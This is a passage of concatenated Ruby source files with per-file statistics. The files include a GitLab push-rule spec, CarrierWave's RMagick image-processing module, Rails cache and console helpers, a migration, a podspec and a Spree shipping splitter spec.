if (conf[:match_key] && (key !~ conf[:match_key])) then
next
end
entry = key.inspect
if (conf[:dump_size]) then
size = db[key].bytesize
entry += ": #{size} bytes"
end
if (conf[:dump_value]) then
v = db[key]
if (conf[:marshal_restore]) then
begin
v = Marshal.restore(v)
rescue
# not marshal object!
end
end
entry += ": #{v.inspect}"
end
puts entry
end
ensure
db.close
end
0
end
command_function :cmd_debug_dump_kvs, "Dump key-value store contents."
end
end
# Local Variables:
# mode: Ruby
# indent-tabs-mode: nil
# End:
| 32.59822 | 166 | 0.517059 |
01121bd7069372ff3602536aeacd5031da73e87d | 816 | # frozen_string_literal: true
class Instructor < ApplicationRecord
has_and_belongs_to_many :positions
validates_presence_of :last_name, :first_name, :utorid
validates_uniqueness_of :utorid
# Returns a formatted string displaying the instructor's contact information
def contact_info
if email?
"#{first_name} #{last_name} <#{email}>"
else
"#{first_name} #{last_name}"
end
end
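  # Example (illustrative, attribute values assumed):
  #   instructor = Instructor.new(first_name: 'Ada', last_name: 'Lovelace', email: '[email protected]')
  #   instructor.contact_info  #=> "Ada Lovelace <[email protected]>"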
end
# == Schema Information
#
# Table name: instructors
#
# id :integer not null, primary key
# first_name :string
# last_name :string
# email :string
# utorid :string not null
# created_at :datetime not null
# updated_at :datetime not null
#
# Indexes
#
# index_instructors_on_utorid (utorid) UNIQUE
#
| 23.314286 | 80 | 0.645833 |
ac5836a588e0a21c3635a9d2085241562096cd4f | 1,083 | require 'active_support/all'
require 'action_controller'
module Rails
module ConsoleMethods
# reference the global "app" instance, created on demand. To recreate the
# instance, pass a non-false value as the parameter.
def app(create=false)
@app_integration_instance = nil if create
@app_integration_instance ||= new_session do |sess|
sess.host! "www.example.com"
end
end
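    # Illustrative console usage (assumed routes/paths): the session returned
    # by `app` can issue requests and, via new_session below, exposes the
    # application's URL helpers.
    #
    #   app.get '/'        # perform a request against the application
    #   app.root_path      # available when a root route is defined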
# create a new session. If a block is given, the new session will be yielded
# to the block before being returned.
def new_session
app = Rails.application
session = ActionDispatch::Integration::Session.new(app)
yield session if block_given?
# This makes app.url_for and app.foo_path available in the console
session.extend(app.routes.url_helpers)
session.extend(app.routes.mounted_helpers)
session
end
# reloads the environment
def reload!(print=true)
puts "Reloading..." if print
ActionDispatch::Reloader.cleanup!
ActionDispatch::Reloader.prepare!
true
end
end
end
| 28.5 | 80 | 0.692521 |
39b68e7e907c3fd026b3435dc202b4b029a6a4ed | 9,108 | require 'spec_helper'
describe PushRule do
using RSpec::Parameterized::TableSyntax
let(:global_push_rule) { create(:push_rule_sample) }
let(:push_rule) { create(:push_rule) }
let(:user) { create(:user) }
let(:project) { Projects::CreateService.new(user, { name: 'test', namespace: user.namespace }).execute }
describe "Associations" do
it { is_expected.to belong_to(:project) }
end
describe "Validation" do
it { is_expected.to validate_presence_of(:project) }
it { is_expected.to validate_numericality_of(:max_file_size).is_greater_than_or_equal_to(0).only_integer }
it 'validates RE2 regex syntax' do
push_rule = build(:push_rule, branch_name_regex: '(ee|ce).*\1')
expect(push_rule).not_to be_valid
expect(push_rule.errors.full_messages.join).to match /invalid escape sequence/
end
end
it 'defaults regexp_uses_re2 to true' do
push_rule = create(:push_rule)
expect(push_rule.regexp_uses_re2).to eq(true)
end
it 'updates regexp_uses_re2 to true on edit' do
push_rule = create(:push_rule, regexp_uses_re2: nil)
expect do
push_rule.update!(branch_name_regex: '.*')
end.to change(push_rule, :regexp_uses_re2).to true
end
describe '#branch_name_allowed?' do
subject(:push_rule) { create(:push_rule, branch_name_regex: '\d+\-.*')}
it 'checks branch against regex' do
expect(subject.branch_name_allowed?('123-feature')).to be true
expect(subject.branch_name_allowed?('feature-123')).to be false
end
it 'uses RE2 regex engine' do
expect_any_instance_of(Gitlab::UntrustedRegexp).to receive(:===)
subject.branch_name_allowed?('123-feature')
end
context 'with legacy regex' do
before do
push_rule.update_column(:regexp_uses_re2, nil)
end
it 'attempts to use safe RE2 regex engine' do
expect_any_instance_of(Gitlab::UntrustedRegexp).to receive(:===)
subject.branch_name_allowed?('ee-feature-ee')
end
it 'falls back to ruby regex engine' do
push_rule.update_column(:branch_name_regex, '(ee|ce).*\1')
expect(subject.branch_name_allowed?('ee-feature-ee')).to be true
expect(subject.branch_name_allowed?('ee-feature-ce')).to be false
end
end
end
describe '#commit_message_allowed?' do
subject(:push_rule) { create(:push_rule, commit_message_regex: '^Signed-off-by')}
it 'uses multiline regex' do
commit_message = "Some git commit feature\n\nSigned-off-by: Someone"
expect(subject.commit_message_allowed?(commit_message)).to be true
end
end
describe '#commit_validation?' do
let(:settings_with_global_default) { %i(reject_unsigned_commits) }
where(:setting, :value, :result) do
:commit_message_regex | 'regex' | true
:branch_name_regex | 'regex' | true
:author_email_regex | 'regex' | true
:file_name_regex | 'regex' | true
:reject_unsigned_commits | true | true
:commit_committer_check | true | true
:member_check | true | true
:prevent_secrets | true | true
:max_file_size | 1 | false
end
with_them do
context "when rule is enabled at global level" do
before do
global_push_rule.update_column(setting, value)
end
it "returns the default value at project level" do
rule = project.push_rule
if settings_with_global_default.include?(setting)
rule.update_column(setting, nil)
end
expect(rule.commit_validation?).to eq(result)
end
end
end
end
methods_and_regexes = {
commit_message_allowed?: :commit_message_regex,
branch_name_allowed?: :branch_name_regex,
author_email_allowed?: :author_email_regex,
filename_blacklisted?: :file_name_regex
}
methods_and_regexes.each do |method_name, regex_attr|
describe "##{method_name}" do
it 'raises a MatchError when the regex is invalid' do
push_rule[regex_attr] = '+'
expect { push_rule.public_send(method_name, 'foo') } # rubocop:disable GitlabSecurity/PublicSend
.to raise_error(PushRule::MatchError, /\ARegular expression '\+' is invalid/)
end
end
end
describe '#commit_signature_allowed?' do
let!(:premium_license) { create(:license, plan: License::PREMIUM_PLAN) }
let(:signed_commit) { double(has_signature?: true) }
let(:unsigned_commit) { double(has_signature?: false) }
context 'when feature is not licensed and it is enabled' do
before do
stub_licensed_features(reject_unsigned_commits: false)
global_push_rule.update_attribute(:reject_unsigned_commits, true)
end
it 'accepts unsigned commits' do
expect(push_rule.commit_signature_allowed?(unsigned_commit)).to eq(true)
end
end
context 'when enabled at a global level' do
before do
global_push_rule.update_attribute(:reject_unsigned_commits, true)
end
it 'returns false if commit is not signed' do
expect(push_rule.commit_signature_allowed?(unsigned_commit)).to eq(false)
end
context 'and disabled at a Project level' do
it 'returns true if commit is not signed' do
push_rule.update_attribute(:reject_unsigned_commits, false)
expect(push_rule.commit_signature_allowed?(unsigned_commit)).to eq(true)
end
end
context 'and unset at a Project level' do
it 'returns false if commit is not signed' do
push_rule.update_attribute(:reject_unsigned_commits, nil)
expect(push_rule.commit_signature_allowed?(unsigned_commit)).to eq(false)
end
end
end
context 'when disabled at a global level' do
before do
global_push_rule.update_attribute(:reject_unsigned_commits, false)
end
it 'returns true if commit is not signed' do
expect(push_rule.commit_signature_allowed?(unsigned_commit)).to eq(true)
end
context 'but enabled at a Project level' do
before do
push_rule.update_attribute(:reject_unsigned_commits, true)
end
it 'returns false if commit is not signed' do
expect(push_rule.commit_signature_allowed?(unsigned_commit)).to eq(false)
end
it 'returns true if commit is signed' do
expect(push_rule.commit_signature_allowed?(signed_commit)).to eq(true)
end
end
context 'when user has enabled and disabled it at a project level' do
before do
# Let's test with the same boolean values that are sent through the form
push_rule.update_attribute(:reject_unsigned_commits, '1')
push_rule.update_attribute(:reject_unsigned_commits, '0')
end
context 'and it is enabled globally' do
before do
global_push_rule.update_attribute(:reject_unsigned_commits, true)
end
it 'returns false if commit is not signed' do
expect(push_rule.commit_signature_allowed?(unsigned_commit)).to eq(false)
end
it 'returns true if commit is signed' do
expect(push_rule.commit_signature_allowed?(signed_commit)).to eq(true)
end
end
end
end
end
describe '#available?' do
shared_examples 'an unavailable push_rule' do
it 'is not available' do
expect(push_rule.available?(:reject_unsigned_commits)).to eq(false)
end
end
shared_examples 'an available push_rule' do
it 'is available' do
expect(push_rule.available?(:reject_unsigned_commits)).to eq(true)
end
end
describe 'reject_unsigned_commits' do
context 'with the global push_rule' do
let(:push_rule) { create(:push_rule_sample) }
context 'with a EE starter license' do
let!(:license) { create(:license, plan: License::STARTER_PLAN) }
it_behaves_like 'an unavailable push_rule'
end
context 'with a EE premium license' do
let!(:license) { create(:license, plan: License::PREMIUM_PLAN) }
it_behaves_like 'an available push_rule'
end
end
context 'with GL.com plans' do
let(:group) { create(:group, plan: plan) }
let(:project) { create(:project, namespace: group) }
let(:push_rule) { create(:push_rule, project: project) }
before do
create(:license, plan: License::PREMIUM_PLAN)
stub_application_setting(check_namespace_plan: true)
end
context 'with a Bronze plan' do
let(:plan) { :bronze_plan }
it_behaves_like 'an unavailable push_rule'
end
context 'with a Silver plan' do
let(:plan) { :silver_plan }
it_behaves_like 'an available push_rule'
end
context 'with a Gold plan' do
let(:plan) { :gold_plan }
it_behaves_like 'an available push_rule'
end
end
end
end
end
| 31.735192 | 110 | 0.657115 |
5d240c76d304e4161b5a7552f8a64bb87b704da1 | 10,962 | # encoding: utf-8
module CarrierWave
##
# This module simplifies manipulation with RMagick by providing a set
# of convenient helper methods. If you want to use them, you'll need to
# require this file:
#
# require 'carrierwave/processing/rmagick'
#
# And then include it in your uploader:
#
# class MyUploader < CarrierWave::Uploader::Base
# include CarrierWave::RMagick
# end
#
# You can now use the provided helpers:
#
# class MyUploader < CarrierWave::Uploader::Base
# include CarrierWave::RMagick
#
# process :resize_to_fit => [200, 200]
# end
#
# Or create your own helpers with the powerful manipulate! method. Check
# out the RMagick docs at http://www.imagemagick.org/RMagick/doc/ for more
# info
#
# class MyUploader < CarrierWave::Uploader::Base
# include CarrierWave::RMagick
#
# process :do_stuff => 10.0
#
# def do_stuff(blur_factor)
# manipulate! do |img|
# img = img.sepiatone
# img = img.auto_orient
# img = img.radial_blur(blur_factor)
# end
# end
# end
#
# === Note
#
  # You should be aware of how RMagick handles memory. manipulate! takes care
# of freeing up memory for you, but for optimum memory usage you should
# use destructive operations as much as possible:
#
# DON'T DO THIS:
# img = img.resize_to_fit
#
# DO THIS INSTEAD:
# img.resize_to_fit!
#
# Read this for more information why:
#
# http://rubyforge.org/forum/forum.php?thread_id=1374&forum_id=1618
#
module RMagick
extend ActiveSupport::Concern
included do
begin
require "rmagick"
rescue LoadError
require "RMagick"
rescue LoadError => e
e.message << " (You may need to install the rmagick gem)"
raise e
end
end
module ClassMethods
def convert(format)
process :convert => format
end
def resize_to_limit(width, height)
process :resize_to_limit => [width, height]
end
def resize_to_fit(width, height)
process :resize_to_fit => [width, height]
end
def resize_to_fill(width, height, gravity=::Magick::CenterGravity)
process :resize_to_fill => [width, height, gravity]
end
def resize_and_pad(width, height, background=:transparent, gravity=::Magick::CenterGravity)
process :resize_and_pad => [width, height, background, gravity]
end
def resize_to_geometry_string(geometry_string)
process :resize_to_geometry_string => [geometry_string]
end
end
##
# Changes the image encoding format to the given format
#
    # See also http://www.imagemagick.org/RMagick/doc/magick.html#formats
#
# === Parameters
#
    # [format (#to_s)] an abbreviation of the format
#
# === Yields
#
# [Magick::Image] additional manipulations to perform
#
# === Examples
#
# image.convert(:png)
#
def convert(format)
manipulate!(:format => format)
@format = format
end
##
# Resize the image to fit within the specified dimensions while retaining
# the original aspect ratio. Will only resize the image if it is larger than the
# specified dimensions. The resulting image may be shorter or narrower than specified
# in the smaller dimension but will not be larger than the specified values.
#
# === Parameters
#
# [width (Integer)] the width to scale the image to
# [height (Integer)] the height to scale the image to
#
# === Yields
#
# [Magick::Image] additional manipulations to perform
#
def resize_to_limit(width, height)
manipulate! do |img|
geometry = Magick::Geometry.new(width, height, 0, 0, Magick::GreaterGeometry)
new_img = img.change_geometry(geometry) do |new_width, new_height|
img.resize(new_width, new_height)
end
destroy_image(img)
new_img = yield(new_img) if block_given?
new_img
end
end
##
# From the RMagick documentation: "Resize the image to fit within the
# specified dimensions while retaining the original aspect ratio. The
# image may be shorter or narrower than specified in the smaller dimension
# but will not be larger than the specified values."
#
    # See also http://www.imagemagick.org/RMagick/doc/image3.html#resize_to_fit
#
# === Parameters
#
# [width (Integer)] the width to scale the image to
# [height (Integer)] the height to scale the image to
#
# === Yields
#
# [Magick::Image] additional manipulations to perform
#
def resize_to_fit(width, height)
manipulate! do |img|
img.resize_to_fit!(width, height)
img = yield(img) if block_given?
img
end
end
##
# From the RMagick documentation: "Resize the image to fit within the
# specified dimensions while retaining the aspect ratio of the original
# image. If necessary, crop the image in the larger dimension."
#
    # See also http://www.imagemagick.org/RMagick/doc/image3.html#resize_to_fill
#
# === Parameters
#
# [width (Integer)] the width to scale the image to
# [height (Integer)] the height to scale the image to
#
# === Yields
#
# [Magick::Image] additional manipulations to perform
#
def resize_to_fill(width, height, gravity=::Magick::CenterGravity)
manipulate! do |img|
img.crop_resized!(width, height, gravity)
img = yield(img) if block_given?
img
end
end
##
# Resize the image to fit within the specified dimensions while retaining
# the original aspect ratio. If necessary, will pad the remaining area
# with the given color, which defaults to transparent (for gif and png,
# white for jpeg).
#
# === Parameters
#
# [width (Integer)] the width to scale the image to
# [height (Integer)] the height to scale the image to
# [background (String, :transparent)] the color of the background as a hexcode, like "#ff45de"
# [gravity (Magick::GravityType)] how to position the image
#
# === Yields
#
# [Magick::Image] additional manipulations to perform
#
def resize_and_pad(width, height, background=:transparent, gravity=::Magick::CenterGravity)
manipulate! do |img|
img.resize_to_fit!(width, height)
new_img = ::Magick::Image.new(width, height) { self.background_color = background == :transparent ? 'rgba(255,255,255,0)' : background.to_s }
if background == :transparent
filled = new_img.matte_floodfill(1, 1)
else
filled = new_img.color_floodfill(1, 1, ::Magick::Pixel.from_color(background))
end
destroy_image(new_img)
filled.composite!(img, gravity, ::Magick::OverCompositeOp)
destroy_image(img)
filled = yield(filled) if block_given?
filled
end
end
##
# Resize the image per the provided geometry string.
#
# === Parameters
#
# [geometry_string (String)] the proportions in which to scale image
#
# === Yields
#
# [Magick::Image] additional manipulations to perform
#
def resize_to_geometry_string(geometry_string)
manipulate! do |img|
new_img = img.change_geometry(geometry_string) do |new_width, new_height|
img.resize(new_width, new_height)
end
destroy_image(img)
new_img = yield(new_img) if block_given?
new_img
end
end
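    # Illustrative example (assumed geometry string): in an uploader,
    #
    #   process :resize_to_geometry_string => ['400x300>']
    #
    # would shrink images larger than 400x300 while preserving aspect ratio,
    # per ImageMagick geometry semantics.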
##
# Manipulate the image with RMagick. This method will load up an image
# and then pass each of its frames to the supplied block. It will then
# save the image to disk.
#
# === Gotcha
#
# This method assumes that the object responds to +current_path+.
# Any class that this module is mixed into must have a +current_path+ method.
# CarrierWave::Uploader does, so you won't need to worry about this in
# most cases.
#
# === Yields
#
# [Magick::Image] manipulations to perform
# [Integer] Frame index if the image contains multiple frames
# [Hash] options, see below
#
# === Options
#
# The options argument to this method is also yielded as the third
# block argument.
#
# Currently, the following options are defined:
#
# ==== :write
# A hash of assignments to be evaluated in the block given to the RMagick write call.
#
# An example:
#
# manipulate! do |img, index, options|
# options[:write] = {
# :quality => 50,
# :depth => 8
# }
# img
# end
#
# This will translate to the following RMagick::Image#write call:
#
# image.write do |img|
# self.quality = 50
# self.depth = 8
# end
#
# ==== :read
# A hash of assignments to be given to the RMagick read call.
#
# The options available are identical to those for write, but are passed in directly, like this:
#
# manipulate! :read => { :density => 300 }
#
# ==== :format
# Specify the output format. If unset, the filename extension is used to determine the format.
#
# === Raises
#
# [CarrierWave::ProcessingError] if manipulation failed.
#
def manipulate!(options={}, &block)
cache_stored_file! if !cached?
read_block = create_info_block(options[:read])
image = ::Magick::Image.read(current_path, &read_block)
frames = ::Magick::ImageList.new
image.each_with_index do |frame, index|
frame = yield *[frame, index, options].take(block.arity) if block_given?
frames << frame if frame
end
frames.append(true) if block_given?
write_block = create_info_block(options[:write])
if options[:format] || @format
frames.write("#{options[:format] || @format}:#{current_path}", &write_block)
move_to = current_path.chomp(File.extname(current_path)) + ".#{options[:format] || @format}"
file.move_to(move_to, permissions, directory_permissions)
else
frames.write(current_path, &write_block)
end
destroy_image(frames)
rescue ::Magick::ImageMagickError => e
raise CarrierWave::ProcessingError, I18n.translate(:"errors.messages.rmagick_processing_error", :e => e, :default => I18n.translate(:"errors.messages.rmagick_processing_error", :e => e, :locale => :en))
end
private
def create_info_block(options)
return nil unless options
assignments = options.map { |k, v| "self.#{k} = #{v}" }
code = "lambda { |img| " + assignments.join(";") + "}"
eval code
end
def destroy_image(image)
image.destroy! if image.respond_to?(:destroy!)
end
end # RMagick
end # CarrierWave
| 30.792135 | 208 | 0.627349 |
79cba3d3dc3a9e225a17eddd11bcfce2622e8c40 | 451 | class CreateBlogPosts < ActiveRecord::Migration[5.1]
def change
create_table :blog_posts do |t|
t.string :title
t.string :post_image
t.text :body
t.references :user, foreign_key: true
t.integer :status
t.integer :post_type
t.boolean :post_public
t.boolean :post_published
t.integer :numComments
t.datetime :publication_date
t.string :author
t.timestamps
end
end
end
| 22.55 | 52 | 0.651885 |
b9ef63243a36504a4502e1a168fc95d91c46e28e | 224 | unless defined?(APP_PATH)
if File.exist?(File.expand_path("test/dummy/config/application.rb", ENGINE_ROOT))
APP_PATH = File.expand_path("test/dummy/config/application", ENGINE_ROOT)
end
end
require "rails/commands"
| 28 | 83 | 0.767857 |
62e95993d940e3c852f4620c4190e2a611ea81f3 | 345 | cask :v1 => 'itools' do
version '2.4.6'
sha256 '412dcd5a082ebf88566a4422e4c1d127e063a65ad9d8f3917e0b29e871da6783'
# itools.hk is the official download host per the vendor homepage
url "http://dl2.itools.hk/dl/iTools_#{version}.dmg"
name 'iTools'
homepage 'http://pro.itools.cn/mac/english'
license :gratis
app 'iTools.app'
end
| 26.538462 | 75 | 0.73913 |
bb733b52b3402887501741c5d16fca009d9a49fc | 5,287 | #
# Be sure to run `pod spec lint testPod.podspec' to ensure this is a
# valid spec and to remove all comments including this before submitting the spec.
#
# To learn more about Podspec attributes see https://guides.cocoapods.org/syntax/podspec.html
# To see working Podspecs in the CocoaPods repo see https://github.com/CocoaPods/Specs/
#
Pod::Spec.new do |spec|
# ――― Spec Metadata ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# These will help people to find your library, and whilst it
# can feel like a chore to fill in it's definitely to your advantage. The
# summary should be tweet-length, and the description more in depth.
#
spec.name = "MADPCommonComponents"
spec.version = "0.0.1"
  spec.summary      = "An example for a Pod."
# This description is used to generate tags and improve search results.
# * Think: What does it do? Why did you write it? What is the focus?
# * Try to keep it short, snappy and to the point.
# * Write the description between the DESC delimiters below.
# * Finally, don't worry about the indent, CocoaPods strips it!
spec.description = <<-DESC
                   A more detailed example description for this Pod.
DESC
spec.homepage = "https://github.com/whisper1ee/MADPCommonComponents"
# spec.screenshots = "www.example.com/screenshots_1.gif", "www.example.com/screenshots_2.gif"
# ――― Spec License ――――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# Licensing your code is important. See https://choosealicense.com for more info.
# CocoaPods will detect a license file if there is a named LICENSE*
# Popular ones are 'MIT', 'BSD' and 'Apache License, Version 2.0'.
#
spec.license = "MIT"
# spec.license = { :type => "MIT", :file => "FILE_LICENSE" }
# ――― Author Metadata ――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# Specify the authors of the library, with email addresses. Email addresses
# of the authors are extracted from the SCM log. E.g. $ git log. CocoaPods also
# accepts just a name if you'd rather not provide an email address.
#
# Specify a social_media_url where others can refer to, for example a twitter
# profile URL.
#
spec.author = { "whisper" => "[email protected]" }
# Or just: spec.author = "whisper"
# spec.authors = { "whisper" => "[email protected]" }
# spec.social_media_url = "https://twitter.com/whisper"
# ――― Platform Specifics ――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# If this Pod runs only on iOS or OS X, then specify the platform and
# the deployment target. You can optionally include the target after the platform.
#
# spec.platform = :ios
spec.platform = :ios, "9.0"
# When using multiple platforms
# spec.ios.deployment_target = "5.0"
# spec.osx.deployment_target = "10.7"
# spec.watchos.deployment_target = "2.0"
# spec.tvos.deployment_target = "9.0"
# ――― Source Location ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# Specify the location from where the source should be retrieved.
# Supports git, hg, bzr, svn and HTTP.
#
spec.source = { :git => "https://github.com/whisper1ee/MADPCommonComponents.git", :tag => "#{spec.version}" }
# ――― Source Code ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# CocoaPods is smart about how it includes source code. For source files
# giving a folder will include any swift, h, m, mm, c & cpp files.
# For header files it will include any header in the folder.
# Not including the public_header_files will make all headers public.
#
# spec.source_files = "MADPGesture.framework/*.{h,m}","MADPGesture.framework"
# spec.exclude_files = "Classes/Exclude"
# spec.public_header_files = "Classes/**/*.h"
# ――― Resources ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# A list of resources included with the Pod. These are copied into the
# target bundle with a build phase script. Anything else will be cleaned.
# You can preserve files from being cleaned, please don't preserve
# non-essential files like tests, examples and documentation.
#
# spec.resource = "icon.png"
# spec.resources = "Resources/*.png"
# spec.preserve_paths = "FilesToSave", "MoreFilesToSave"
# ――― Project Linking ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# Link your library with frameworks, or libraries. Libraries do not include
# the lib prefix of their name.
#
spec.frameworks = "Foundation", "UIKit", "CoreLocation"
spec.vendored_frameworks = "MADPCommonComponents.framework"
# spec.framework = "SomeFramework"
# spec.library = "iconv"
# spec.libraries = "iconv", "xml2"
# ――― Project Settings ――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# If your library depends on compiler flags you can set them in the xcconfig hash
# where they will only apply to your library. If you depend on other Podspecs
# you can include multiple dependencies to ensure it works.
spec.requires_arc = true
# spec.xcconfig = { "HEADER_SEARCH_PATHS" => "$(SDKROOT)/usr/include/libxml2" }
# spec.dependency "JSONKit", "~> 1.4"
end
| 37.496454 | 117 | 0.60488 |
bf1c8ceaed3aede449629dd3ac3a190b585357b7 | 10,688 | module ActionView
# = Action View Cache Helper
module Helpers
module CacheHelper
# This helper exposes a method for caching fragments of a view
      # rather than an entire action or page. This technique is useful for
      # caching pieces like menus, lists of new topics, static HTML
# fragments, and so on. This method takes a block that contains
# the content you wish to cache.
#
# The best way to use this is by doing key-based cache expiration
# on top of a cache store like Memcached that'll automatically
# kick out old entries. For more on key-based expiration, see:
# http://signalvnoise.com/posts/3113-how-key-based-cache-expiration-works
#
# When using this method, you list the cache dependency as the name of the cache, like so:
#
# <% cache project do %>
# <b>All the topics on this project</b>
# <%= render project.topics %>
# <% end %>
#
# This approach will assume that when a new topic is added, you'll touch
# the project. The cache key generated from this call will be something like:
#
# views/projects/123-20120806214154/7a1156131a6928cb0026877f8b749ac9
# ^class ^id ^updated_at ^template tree digest
#
# The cache is thus automatically bumped whenever the project updated_at is touched.
#
# If your template cache depends on multiple sources (try to avoid this to keep things simple),
# you can name all these dependencies as part of an array:
#
# <% cache [ project, current_user ] do %>
# <b>All the topics on this project</b>
# <%= render project.topics %>
# <% end %>
#
# This will include both records as part of the cache key and updating either of them will
# expire the cache.
#
# ==== \Template digest
#
# The template digest that's added to the cache key is computed by taking an MD5 of the
# contents of the entire template file. This ensures that your caches will automatically
# expire when you change the template file.
#
# Note that the MD5 is taken of the entire template file, not just what's within the
# cache do/end call. So it's possible that changing something outside of that call will
# still expire the cache.
#
# Additionally, the digestor will automatically look through your template file for
# explicit and implicit dependencies, and include those as part of the digest.
#
# The digestor can be bypassed by passing skip_digest: true as an option to the cache call:
#
# <% cache project, skip_digest: true do %>
# <b>All the topics on this project</b>
# <%= render project.topics %>
# <% end %>
#
# ==== Implicit dependencies
#
# Most template dependencies can be derived from calls to render in the template itself.
# Here are some examples of render calls that Cache Digests knows how to decode:
#
# render partial: "comments/comment", collection: commentable.comments
# render "comments/comments"
# render 'comments/comments'
# render('comments/comments')
#
# render "header" translates to render("comments/header")
#
# render(@topic) translates to render("topics/topic")
# render(topics) translates to render("topics/topic")
# render(message.topics) translates to render("topics/topic")
#
# It's not possible to derive all render calls like that, though.
# Here are a few examples of things that can't be derived:
#
# render group_of_attachments
# render @project.documents.where(published: true).order('created_at')
#
# You will have to rewrite those to the explicit form:
#
# render partial: 'attachments/attachment', collection: group_of_attachments
# render partial: 'documents/document', collection: @project.documents.where(published: true).order('created_at')
#
# === Explicit dependencies
#
# Sometimes you'll have template dependencies that can't be derived at all. This is typically
# the case when you have template rendering that happens in helpers. Here's an example:
#
# <%= render_sortable_todolists @project.todolists %>
#
# You'll need to use a special comment format to call those out:
#
# <%# Template Dependency: todolists/todolist %>
# <%= render_sortable_todolists @project.todolists %>
#
# In some cases, like a single table inheritance setup, you might have
# a bunch of explicit dependencies. Instead of writing every template out,
# you can use a wildcard to match any template in a directory:
#
# <%# Template Dependency: events/* %>
# <%= render_categorizable_events @person.events %>
#
# This marks every template in the directory as a dependency. To find those
# templates, the wildcard path must be absolutely defined from app/views or paths
# otherwise added with +prepend_view_path+ or +append_view_path+.
# This way the wildcard for `app/views/recordings/events` would be `recordings/events/*` etc.
#
# The pattern used to match explicit dependencies is <tt>/# Template Dependency: (\S+)/</tt>,
# so it's important that you type it out just so.
# You can only declare one template dependency per line.
#
# === External dependencies
#
# If you use a helper method, for example, inside a cached block and
# you then update that helper, you'll have to bump the cache as well.
# It doesn't really matter how you do it, but the MD5 of the template file
# must change. One recommendation is to simply be explicit in a comment, like:
#
# <%# Helper Dependency Updated: May 6, 2012 at 6pm %>
# <%= some_helper_method(person) %>
#
# Now all you have to do is change that timestamp when the helper method changes.
#
# === Collection Caching
#
# When rendering a collection of objects that each use the same partial, a `cached`
# option can be passed.
#
# For collections rendered such:
#
# <%= render partial: 'projects/project', collection: @projects, cached: true %>
#
# The `cached: true` will make Action View's rendering read several templates
# from cache at once instead of one call per template.
#
# Templates in the collection not already cached are written to cache.
#
# Works great alongside individual template fragment caching.
# For instance if the template the collection renders is cached like:
#
# # projects/_project.html.erb
# <% cache project do %>
# <%# ... %>
# <% end %>
#
# Any collection renders will find those cached templates when attempting
# to read multiple templates at once.
#
# If your collection cache depends on multiple sources (try to avoid this to keep things simple),
# you can name all these dependencies as part of a block that returns an array:
#
# <%= render partial: 'projects/project', collection: @projects, cached: -> project { [ project, current_user ] } %>
#
# This will include both records as part of the cache key and updating either of them will
# expire the cache.
def cache(name = {}, options = {}, &block)
if controller.respond_to?(:perform_caching) && controller.perform_caching
name_options = options.slice(:skip_digest, :virtual_path)
safe_concat(fragment_for(cache_fragment_name(name, name_options), options, &block))
else
yield
end
nil
end
# Cache fragments of a view if +condition+ is true
#
# <% cache_if admin?, project do %>
# <b>All the topics on this project</b>
# <%= render project.topics %>
# <% end %>
def cache_if(condition, name = {}, options = {}, &block)
if condition
cache(name, options, &block)
else
yield
end
nil
end
# Cache fragments of a view unless +condition+ is true
#
# <% cache_unless admin?, project do %>
# <b>All the topics on this project</b>
# <%= render project.topics %>
# <% end %>
def cache_unless(condition, name = {}, options = {}, &block)
cache_if !condition, name, options, &block
end
# This helper returns the name of a cache key for a given fragment cache
# call. By supplying +skip_digest:+ true to cache, the digestion of cache
# fragments can be manually bypassed. This is useful when cache fragments
# cannot be manually expired unless you know the exact key which is the
# case when using memcached.
#
# The digest will be generated using +virtual_path:+ if it is provided.
#
def cache_fragment_name(name = {}, skip_digest: nil, virtual_path: nil)
if skip_digest
name
else
fragment_name_with_digest(name, virtual_path)
end
end
attr_reader :cache_hit # :nodoc:
private
def fragment_name_with_digest(name, virtual_path) #:nodoc:
virtual_path ||= @virtual_path
if virtual_path
name = controller.url_for(name).split("://").last if name.is_a?(Hash)
digest = Digestor.digest name: virtual_path, finder: lookup_context, dependencies: view_cache_dependencies
[ name, digest ]
else
name
end
end
def fragment_for(name = {}, options = nil, &block) #:nodoc:
if content = read_fragment_for(name, options)
@cache_hit = true
content
else
@cache_hit = false
write_fragment_for(name, options, &block)
end
end
def read_fragment_for(name, options) #:nodoc:
controller.read_fragment(name, options)
end
def write_fragment_for(name, options) #:nodoc:
# VIEW TODO: Make #capture usable outside of ERB
# This dance is needed because Builder can't use capture
pos = output_buffer.length
yield
output_safe = output_buffer.html_safe?
fragment = output_buffer.slice!(pos..-1)
if output_safe
self.output_buffer = output_buffer.class.new(output_buffer)
end
controller.write_fragment(name, fragment, options)
end
end
end
end
| 41.426357 | 124 | 0.628743 |
4a691a35c3402edb7ab1d478082d6ef0e2ab12d3 | 336 | class Benchmarker
def initialize(target, size)
end
def setup
end
def generate
end
def run(args=nil)
# Just running help is probably a good proxy of a full startup.
# Simply asking for the version might also be good, but it would miss all
# of the app searching and loading parts
`puppet help`
end
end
| 18.666667 | 77 | 0.696429 |
871d0bc09a7b96b3d5b2c8f80b687ddd8fcd95a5 | 1,530 | require 'spec_helper'
module Spree
module Stock
module Splitter
describe ShippingCategory do
let(:variant1) { build(:variant) }
let(:variant2) { build(:variant) }
let(:shipping_category_1) { create(:shipping_category, name: 'A') }
let(:shipping_category_2) { create(:shipping_category, name: 'B') }
def inventory_unit1
build(:inventory_unit, variant: variant1).tap do |inventory_unit|
inventory_unit.variant.product.shipping_category = shipping_category_1
end
end
def inventory_unit2
build(:inventory_unit, variant: variant2).tap do |inventory_unit|
inventory_unit.variant.product.shipping_category = shipping_category_2
end
end
let(:packer) { build(:stock_packer) }
subject { ShippingCategory.new(packer) }
it 'splits each package by shipping category' do
package1 = Package.new(packer.stock_location)
4.times { package1.add inventory_unit1 }
8.times { package1.add inventory_unit2 }
package2 = Package.new(packer.stock_location)
6.times { package2.add inventory_unit1 }
9.times { package2.add inventory_unit2, :backordered }
packages = subject.split([package1, package2])
packages[0].quantity.should eq 4
packages[1].quantity.should eq 8
packages[2].quantity.should eq 6
packages[3].quantity.should eq 9
end
end
end
end
end
| 31.22449 | 82 | 0.637255 |
